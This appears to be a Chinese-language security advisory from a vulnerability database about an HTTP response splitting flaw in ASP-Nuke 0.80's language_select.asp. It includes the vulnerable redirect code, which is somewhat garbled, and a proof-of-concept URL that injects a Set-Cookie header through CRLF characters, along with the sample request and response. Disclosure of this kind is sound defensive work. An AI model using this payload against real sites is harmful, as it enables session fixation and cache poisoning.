ASP-Nuke <= 0.80 language_select.aspHTTP响应拆分漏洞

2005-08-18T00:00:00
ID SSV:19613
Type seebug
Reporter Root
Modified 2005-08-18T00:00:00

Description

BUGTRAQ: 14063

ASPNuke中存在HTTP响应拆分漏洞,成功利用这个漏洞的攻击者可以影响或误导保存、缓存或解释Web内容的方式。

起因是没有正确的过滤用户输入。请看/module/support/language/language_select.asp第31行代码:

       ...
  If steForm( action ) =  go  Then

make sure the required fields are present If Trim(steForm( LangCode )) = Then sErrorMsg = steGetText( Please select a language from the list below ) Else

redirect to the language administration Response.Redirect tran_list.asp?langcode= & steEncForm( LangCode ) End If End If ... ?> 在重新定向时,由于没有过滤攻击者可能执行CRLF注入攻击。

ASP-Nuke <= 0.80 厂商补丁: ASP-Nuke


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.asp-nuke.com/downloads.asp

                                        
                                            
                                                http://www.example.com/module/support/language/language_select.asp?action=go&amp;LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue

 

 以下是HTTP首部示例:

     请求:
          POST
  /module/support/language/language_select.asp?action=go&amp;LangCode=trivero%0d%0
  aSet-Cookie%3Asome%3Dvalue HTTP/1.0
          Accept: */*
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
          Host: www.aspnuke.com
          Content-Length: 90
          Cookie: ASPSESSIONIDSCRDCDAD=NMDFFFJBFMLBNDNFJDFGAGPP;LANGUAGE=US
          Connection: Close

     响应:
          HTTP/1.1 302 Object moved
          Server: Microsoft-IIS/5.0
          Date: Sun, 15 May 2005 11:31:37 GMT
          Pragma: no-cache
          Location: tran_list.asp?langcode=trivero
          Set-Cookie: some=value
          Connection: Keep-Alive
          Content-Length: 121
          Content-Type: text/html
          Expires: Sun, 15 May 2005 11:30:38 GMT
          Cache-control: no-cache